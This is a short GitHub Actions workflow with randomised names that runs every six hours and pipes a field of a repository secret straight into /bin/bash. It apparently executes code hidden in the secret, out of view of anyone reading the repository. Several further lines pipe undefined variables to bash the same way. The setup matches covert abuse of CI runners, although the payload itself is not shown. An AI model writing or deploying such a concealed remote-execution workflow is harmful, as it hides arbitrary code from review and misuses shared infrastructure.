name: guzhengqiu3817
on:
  workflow_dispatch:
  schedule:
    - cron: '43 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guzhengqiu3817
        env:
          sspst745: ${{ secrets.sspst745 }}
        run: |
          echo $sspst745 | jq -r .s8 | /bin/bash
          echo $gf74457 | jq -r .tngq266 | /bin/bash
          echo $ozd648 | jq -r .wf4933 | /bin/bash
          echo $qkoh0153 | jq -r .nl649 | /bin/bash
          echo $xmny6 | jq -r .nhkz180 | /bin/bash

